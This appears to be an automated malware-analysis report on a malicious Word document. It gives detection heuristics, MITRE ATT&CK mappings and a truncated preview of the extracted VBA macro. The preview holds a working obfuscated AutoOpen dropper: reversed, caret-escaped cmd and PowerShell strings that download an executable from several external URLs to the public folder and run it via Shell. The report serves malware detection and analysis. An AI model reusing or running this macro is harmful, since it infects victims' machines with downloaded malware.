MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Microsoft Word document containing a VBA macro. The AutoOpen macro is designed to execute a command using Shell, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Downloader.Emooodldr-6689976-0' further supports its role as a downloader.
Heuristics 5
-
ClamAV: Doc.Downloader.Emooodldr-6689976-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emooodldr-6689976-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4534 bytes |
SHA-256: b8c196fc71fd8fc01ffef2ad49a4c904d079c45c228ca8da49165ff6bc337189 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DBKDWFuIhNwzVw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const vjKOKlU = 0
Dim driCYS(2)
driCYS(0) = Right(JVFjZ, 862)
driCYS(1) = MidB(ZojZHrv, 809, 684)
Dim MIbjca(3)
MIbjca(0) = Right(JVFjZ, 862)
MIbjca(1) = Mid(EOqjzdt, 323, 516)
MIbjca(2) = Right(JVFjZ, 862)
Dim ILVJd(5)
ILVJd(0) = Right(JVFjZ, 862)
ILVJd(1) = MidB(ZojZHrv, 809, 684)
ILVJd(2) = Left(Xdurj, 100)
ILVJd(3) = Mid(EOqjzdt, 323, 516)
ILVJd(4) = Left(Xdurj, 100)
Dim huziw(4)
huziw(0) = Left(Xdurj, 100)
huziw(1) = MidB(ZojZHrv, 809, 684)
huziw(2) = Left(Xdurj, 100)
huziw(3) = MidB(ZojZHrv, 809, 684)
Dim Mnfjzi(5)
Mnfjzi(0) = Left(Xdurj, 100)
Mnfjzi(1) = Right(JVFjZ, 862)
Mnfjzi(2) = MidB(ZojZHrv, 809, 684)
Mnfjzi(3) = Right(JVFjZ, 862)
Mnfjzi(4) = Left(Xdurj, 100)
Shell@ SdYTp + aTlfHVjQIvf + zXOhiibnrP, CInt(vjKOKlU)
Dim RLtFPZ(4)
RLtFPZ(0) = Left(Xdurj, 100)
RLtFPZ(1) = Left(Xdurj, 100)
RLtFPZ(2) = Right(JVFjZ, 862)
RLtFPZ(3) = MidB(ZojZHrv, 809, 684)
Dim CAYIzk(4)
CAYIzk(0) = MidB(ZojZHrv, 809, 684)
CAYIzk(1) = Mid(EOqjzdt, 323, 516)
CAYIzk(2) = Left(Xdurj, 100)
CAYIzk(3) = Mid(EOqjzdt, 323, 516)
End Sub
Attribute VB_Name = "HJXWrpqHU"
Function SdYTp()
Dim FXnVM(3)
FXnVM(0) = Mid(EOqjzdt, 323, 516)
FXnVM(1) = MidB(ZojZHrv, 809, 684)
FXnVM(2) = Right(JVFjZ, 862)
Dim kiDRl(3)
kiDRl(0) = Left(Xdurj, 100)
kiDRl(1) = Left(Xdurj, 100)
kiDRl(2) = Mid(EOqjzdt, 323, 516)
qoUEHwZz = Format(Chr(3 + 9 + 3 + 0 + 84)) + "md /V^:ON/" + Format(Chr(2 + 6 + 2 + 0 + 57)) + Format(Chr(1 + 3 + 1 + 0 + 29)) + "^se^t ^Ke= ^" + " ^ ^ ^ ^ ^ ^ }" + "^}{h" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ta" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "};^kaer^b^;zkw$ ^" + "m^e^tI^-^e^kovn^I;" + ")zk^w^$ ,^Z^UV$(^eliFdao" + "^ln^woD^.a^z^l${" + "^yrt{)j^FV$" + "^ ni ZUV$(^h"
Dim GJIzU(3)
GJIzU(0) = Right(JVFjZ, 862)
GJIzU(1) = Left(Xdurj, 100)
GJIzU(2) = Right(JVFjZ, 862)
Dim YYIwF(4)
YYIwF(0) = Right(JVFjZ, 862)
YYIwF(1) = Left(Xdurj, 100)
YYIwF(2) = Mid(EOqjzdt, 323, 516)
YYIwF(3) = MidB(ZojZHrv, 809, 684)
Dim VPsSo(3)
VPsSo(0) = Left(Xdurj, 100)
VPsSo(1) = MidB(ZojZHrv, 809, 684)
VPsSo(2) = Right(JVFjZ, 862)
bYUpXlw = Format(Chr(3 + 9 + 3 + 0 + 84)) + "aerof;'^e^xe^.^'^+q^pv$+'\" + "^'^+" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ilbu^p:vne$=" + "^z^kw$;^'^45^6^' =^ q^pv$;)'^@" + "'(^t^ilp^S^.^'^F^aV^z^zm^U^lw" + "Q/^eg.^ana^h^s^o^h^s//^:p" + "^t^t^h@0gE4^6U^9^lN/ri^." + "^ap^sdn^al//^:ptt^h@" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "z^zy" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "wE" + "/^s^e^.^la^t^i^pa" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^a^dno//^:" + "^ptth^@^8^b^p" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "^7f^o/mo" + Format(Chr(3 + 9 + 3 + 0 + 84)) + ".se" + "^ige^tarts^dni^mnir"
Dim TmMLp(5)
TmMLp(0) = Mid(EOqjzdt, 323, 516)
TmMLp(1) = Left(Xdurj, 100)
TmMLp(2) = Left(Xdurj, 100)
TmMLp(3) = MidB(ZojZHrv, 809, 684)
TmMLp(4) = Left(Xdurj, 100)
Dim FrnWaj(3)
FrnWaj(0) = Left(Xdurj, 100)
FrnWaj(1) = Left(Xdurj, 100)
FrnWaj(2) = Right(JVFjZ, 862)
WzHqWJWbBXQ = "a^e^b//^:^pt^th^@^LIN^" + "M^Y^in^hz/" + "gr^o.re^t" + "r^o^pb^a//:^pt^th'" + "=^jFV^$^;^tn^eil" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "b^eW.^teN" + " t" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^e^jb^o-^w^e" + "n^=azl^$ ^lleh^srewop&&^f" + "or /^L %^D ^in (3^6^7;^-1" + "^;^0)^d^o s^e^t ^" + "if=!^if!!^Ke" + ":~%^D,1!&&i^f" + " %^D ^l^ss ^1 " + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^" + "a^l^l %^if:^*^if^!="
Dim LWJFWj(4)
LWJFWj(0) = Left(Xdurj, 100)
LWJFWj(1) = Right(JVFjZ, 862)
LWJFWj(2) = MidB(ZojZHrv, 809, 684)
LWJFWj(3) = Mid(EOqjzdt, 323, 516)
Dim bwuVfz(2)
bwuVfz(0) = Right(JVFjZ, 862)
bwuVfz(1) = Right(JVFjZ, 862)
Dim zbYtJ(4)
zbYtJ(0) = Left(Xdurj, 100)
zbYtJ(1) = MidB(ZojZHrv, 809, 684)
zbYtJ(2) = Right(JVFjZ, 862)
zbYtJ(3) = Mid(EOqjzdt, 323, 516)
Dim vsQWWO(3)
vsQWWO(0)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.